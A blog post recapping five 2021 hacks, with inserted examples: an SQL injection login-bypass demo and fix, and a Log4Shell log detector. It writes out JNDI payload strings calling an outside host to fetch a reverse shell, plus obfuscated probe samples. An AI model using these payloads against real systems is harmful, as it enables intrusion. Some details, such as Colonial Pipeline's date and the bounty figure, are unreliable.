
March 29, 2022

The Top 5 Hacks of 2021

Here are some of my favourite hacks from last year


XSS Rat

According to a report from Cybersecurity Ventures, the world was expected to lose six trillion dollars to cybercrime in 2021. We can’t verify whether that estimate was spot on, but given that 2021 seemed like a year for hackers, who produced one huge data breach after another, the losses are likely in that range. And, as a nice note for cybersecurity professionals, these estimated yearly losses are expected to double by 2025!

While there were numerous hacking scandals in 2021 (you might remember SolarWinds or CD Projekt Red), I’m here to talk about the five that were most interesting to me as a hacker. I’ll explain how each hack happened and how it wreaked havoc. Hopefully, you can learn from the mistakes of these large corporations!

1. Colonial Pipeline

Despite the global shift towards green energy, we still rely heavily on fossil fuels to travel, heat our apartments, and power our cities. If someone were to cut that lifeline, things would get a bit crazy. Well, that’s exactly what the ransomware gang DarkSide did in July 2021. DarkSide set its sights on Colonial Pipeline, a major pipeline system running across America.

The Colonial pipeline was constructed by the Colonial Pipeline Company in 1962. It spans a massive 5,500 miles (8,850 kilometers) between Texas and New York and consists of two huge pipes which carry three million barrels of fuel every single day!

DarkSide hit the pipeline with a major cyberattack which indirectly caused a temporary fuel shortage across America. How? The hackers encrypted important files and kept the decryption key to themselves. This made it impossible for the Colonial Pipeline Company to bill its customers, since it no longer had access to that information, basically messing up the entire operation.

DarkSide offered to sell the decryption key back to Colonial Pipeline for a small fee of 75 Bitcoins (about 4 million USD at the time). The company, held hostage, delayed the payout, hoping the authorities would catch the hackers, and this led to a nationwide fuel shortage.

What ensued was a domestic scramble for gas, kind of like the COVID toilet paper shortage. There were reports of fuel stockpiling and empty gas stations all across America. 

In the end, the Colonial Pipeline Company folded and paid the Bitcoins. And while the DarkSide gang hasn’t been brought to justice, the FBI has said they’ve reclaimed most of the ransom and have stuck the gang with a pretty hefty bounty ($10,00,000 USD) — so if you know anyone that was involved…

2. Kaseya hack


You might not have heard of this company, Kaseya. It’s a big player in the MSP (managed service provider) space, pretty widely recognised in the industry. Kaseya services IT departments and MSPs in all sorts of companies, large and small, including some government departments.

In July 2021, Kaseya was hit by a cyberattack from a group known as REvil (Russian-based hackers). They installed malware on Kaseya’s systems, which in turn infected the other systems connected to them (i.e. companies that were using Kaseya software). This is what we call a supply chain attack: hackers target one system with the aim of infecting the many systems connected to it.

The attackers were able to do this by discovering a vulnerability in the Kaseya software, and the worst part is that this vulnerability was known within the company for a long time (slow clap). Apparently, Kaseya was working to fix it, but by the time the patch was ready, it was already too late.

It turns out that the hackers abused a SQLi (SQL injection) vulnerability. This is where attackers send malicious input that changes the logic of a SQL query, for example a query used for logging in. They were able to log in this way and get around the authentication measures in place.
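To make the login bypass described above concrete, here is an added example (my own illustration, not Kaseya’s code and not code from the original post). It builds a constructed in-memory SQLite user table, shows a login function that glues the username into the query string, and the fixed version that uses a parameterised query and a constant-time hash comparison. The table layout, account names and the SHA-256 hashing are assumptions for the demo; a real system would use a slow password hash such as bcrypt or Argon2.

```python
import hashlib
import hmac
import sqlite3


def _hash(password: str) -> str:
    # Plain SHA-256 keeps the example short; production code uses bcrypt/Argon2 (assumption for demo).
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed in-memory user table with two sample accounts (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("admin", _hash("correct horse battery staple")), ("alice", _hash("alice-pass"))],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable: the username is concatenated into the SQL text, so the database
    parses whatever the user typed as part of the query. A username such as
    "admin' --" closes the string literal and comments out the password check."""
    query = (
        "SELECT id FROM users WHERE username = '" + username
        + "' AND password_hash = '" + _hash(password) + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened: a parameterised query sends the username as data, never as SQL,
    and the hash comparison is done in Python with a constant-time compare."""
    row = conn.execute(
        "SELECT password_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0], _hash(password))


if __name__ == "__main__":
    db = make_db()
    bypass = "admin' --"
    print("vulnerable, bypass input:", login_vulnerable(db, bypass, "anything"))  # True
    print("safe, bypass input:     ", login_safe(db, bypass, "anything"))        # False
    print("safe, real credentials: ", login_safe(db, "admin", "correct horse battery staple"))
```

Note that the injection does not need the attacker to know any password: the comment marker removes the `AND password_hash = ...` clause entirely, which is exactly the class of authentication bypass described above. Parameterised queries close that door because the driver never lets user input reach the SQL parser.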

The Kaseya systems were compromised one by one. In total, over 1,500 organisations were struck by this monster attack. REvil demanded varying ransoms depending on the organisation, anything from $45,000 to $15 million.

In the final moments of this hack, the ransomware’s creator offered to sell a universal decryptor for a flat fee of $70 million. Unfortunately for him, he was caught before receiving any funds, ending his ransomware spree, but not before infecting hundreds of organisations.

Those gossiping on Twitter tried to pin this attack on Putin since it was supposedly run out of Russia. Likewise, it was also suspected U.S. agencies were involved in the attacks since they don’t have the best track record… 

The whole ordeal lasted only a few weeks before a security firm released a universal decryptor. This unlocked the files that had previously been encrypted, giving those organisations affected their files back. 

After a few days of tense decrypting, a large portion of Kaseya’s customers could breathe a sigh of relief. But as far as the US CISA (Cybersecurity and Infrastructure Security Agency) is concerned, this is far from over. They are busy warning MSPs (managed service providers) and their clients about the risks and have even released guidelines for both MSPs and their customers.

3. Twitch


The popular streaming platform Twitch has taken massive strides in the last few years. There’s been a surge in viewers, with Twitch attracting and retaining huge influencers. Generally, Twitch has been known to pay its talent quite well, often striking massive deals to keep them on the platform.

The community has always been quick to call out Twitch on its mistakes, so when last year’s data breach happened, it was the perfect nightmare. What sparked this breach was a very simple misconfiguration in a server. A malicious third party exploited this misconfiguration and was able to steal some very valuable data from Twitch, including its source code.

You’d think that having your source code leaked would be bad enough; that’s like Coca-Cola’s secret recipe being leaked. Yet on top of the code leak, the revenue data of all of Twitch’s top creators was also leaked. The creators were not happy. The donation data, bit gifts (bits are a small form of currency viewers can use to donate to their favourite creators), and ad revenue were all posted for public consumption (see below).

In total, 128 GB of data was leaked, which made a big dent in the public image of the company. They have mostly recovered, but not before having to endure a huge backlash for this seemingly innocent misconfiguration. The nefarious culprits behind this hack have yet to be caught.

4. Microsoft Exchange hacks


Microsoft Exchange is a popular mail server used by many businesses and companies, similar to Google Workspace. When it got hacked in January, supposedly by Hafnium, a Chinese state-sponsored hacking group, it spelled disaster for many companies. Email addresses and passwords were compromised, and private emails were leaked — all those sensitive company exchanges you don’t want millions of people reading…

Around 250,000 servers were exploited, exposing NGOs, universities, and local governments. Outside of the USA, the attack also hit banks, costing their clients millions of dollars in compound damage.

Besides stealing emails, a new wave of ransomware known as a crypto locker was unleashed on exposed servers. It could encrypt all the files on an Exchange server, rendering it inoperable until a ransom is paid, and even then the hacker might not release the key.

A patch was released in March to combat the hack, but it took weeks and even months before it was fully rolled out, meaning the damage was more or less done. Thankfully though, Microsoft was able to report that 92% of the existing Exchange servers had been patched by March 22nd.

Isn’t it funny how China seems to just get away with hacking a huge American corporation without the slightest repercussions…

5. Log4Shell

Near the end of 2021, a vulnerability was disclosed that gave Java application sysadmins probably their worst week ever. When the exploit first came to light, there was uncertainty all round as servers got struck left and right. Even Minecraft servers got hit with this remote code execution.

The exploit enabled attackers to execute their own code on the server. As a result, attackers were able to take over any internet-connected server or service that included the vulnerable Log4j library.

The hack worked by exploiting something called “message lookup substitution”, which can be compared to the templating functionality some of you might be familiar with. Basically, certain strings in a log message trigger a lookup, such as ${java:version}, which prints the version of Java, i.e. “version 2.4.6_4”. This is an innocent lookup, but some strings can do much worse, such as ${jndi:ldap://hackxpert.com}, which could trigger an outbound request from the logging code to hackxpert.com. This exploit has been given a Common Vulnerability Scoring System (CVSS) score of 10.0 (critical severity). Such a high rating seems unusual, but considering how trivial the attack vector is and what the consequences are, the rating is justified.

When the attackers sent a request containing the string (${jndi:ldap://hackxpert.com}, for example), they would first see a request arrive at their web server. Consequently, they would host malicious code on their web server and have it requested again (${jndi:ldap://hackxpert.com/exploit.php}, for example, where exploit.php contains a reverse shell). This might grant the attacker access to the server if their code is executed.
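Because the whole problem is that a lookup string anywhere in logged input gets evaluated, the most useful thing for a defender to have is a detector that spots such strings in web server logs, including the nested-lookup variants that hide the word “jndi” behind other lookups. The following is an added example (my own code, not from the original post and not part of Log4j): it de-obfuscates the lower/upper and ${name:-default} lookup forms and then flags any ${jndi:…} pointing at a remote ldap, ldaps, rmi or dns resolver. The sample access-log lines and the 203.0.113.x addresses are constructed test data, and only those few lookup forms are modelled, which is an assumption; Log4j supports more.

```python
import re

# Innermost ${...} lookup: its body contains no further "${" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# After de-obfuscation, a JNDI lookup that points at a remote resolver is the signal.
JNDI_REMOTE = re.compile(r"\$\{jndi:(?:ldaps?|rmi|dns)://", re.IGNORECASE)


def _resolve(lookup: str) -> str:
    """Evaluate the lookup forms commonly used to hide 'jndi' (assumption: only
    lower/upper and the ${name:-default} syntax are modelled here)."""
    if ":-" in lookup:
        # ${env:doesNotExist:-j} falls back to its default value "j"
        return lookup.split(":-", 1)[1]
    key, _, arg = lookup.partition(":")
    if key.lower() == "lower":
        return arg.lower()
    if key.lower() == "upper":
        return arg.upper()
    # Unknown lookups (jndi, java, date, ...) are returned unchanged so the
    # rewrite loop reaches a fixed point and terminates.
    return "${" + lookup + "}"


def normalize(text: str, max_rounds: int = 25) -> str:
    """Repeatedly resolve innermost lookups until nothing changes."""
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def is_log4shell_probe(line: str) -> bool:
    return JNDI_REMOTE.search(normalize(line)) is not None


def scan(lines):
    """Return (index, line) pairs for every line that carries a remote JNDI lookup."""
    return [(i, line) for i, line in enumerate(lines) if is_log4shell_probe(line)]


# Constructed sample access log (not real traffic); the User-Agent field is the
# classic place such strings turn up because many apps log it verbatim.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:13:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:13:01:09 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/a}"',
    '203.0.113.11 - - [10/Dec/2021:13:02:00 +0000] "GET /?q=${java:version} HTTP/1.1" 200 77 "-" "curl/7.79"',
    '203.0.113.12 - - [10/Dec/2021:13:02:30 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}ndi:rmi://203.0.113.10:1099/x}"',
]


if __name__ == "__main__":
    for idx, hit in scan(SAMPLE_ACCESS_LOG):
        print(f"line {idx}: {normalize(hit)}")
```

The detector deliberately ignores ${java:version}: it is a local lookup and, while noisy, it is not the remote class-loading path that makes Log4Shell critical. Scanning logs is a stopgap for finding who probed you; the actual fix is upgrading Log4j to a patched release (or removing the JNDI lookup class where upgrading is impossible) and treating any host that logged such a string as potentially compromised.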

When the exploit was first released, some crafty Minecraft players were even able to use it to gain real-life cash by manipulating game servers. They would backdoor the servers using this exploit and assign themselves items on servers that enable real-world trading. They were then able to sell all these items for a massive profit!

Updates were eventually released to patch the problem, but with over 7,000 Maven artifacts containing Log4j, this will drag on for months if not years to come. Though it is certain most servers have been fixed by now, who knows how many are still vulnerable because they did not implement proper security protocols?

Summary

When we think about hacks, we often think of the Bitcoin ransoms and the monetary loss incurred. But in reality, losing a couple of Bitcoin is only the tip of the iceberg. Public hacks like those mentioned above expose personal details, destroy reputations, turn off investors, and make public what is discussed in private. Hell, the Colonial Pipeline hack caused weeks of panic and exposed the weakness of one of the mightiest nations.

What’s frightening about this list is that only one of these major hacker groups was brought to justice. That says something about the level of cybercrime sophistication going on out there. And when you look at it, none of these are small players — Microsoft, Twitch (Amazon-owned), these are global companies. If they’re not safe, what does that say about the average internet user? It’s more important than ever to stay vigilant and not let the rise in technology blind us to its inherent dangers.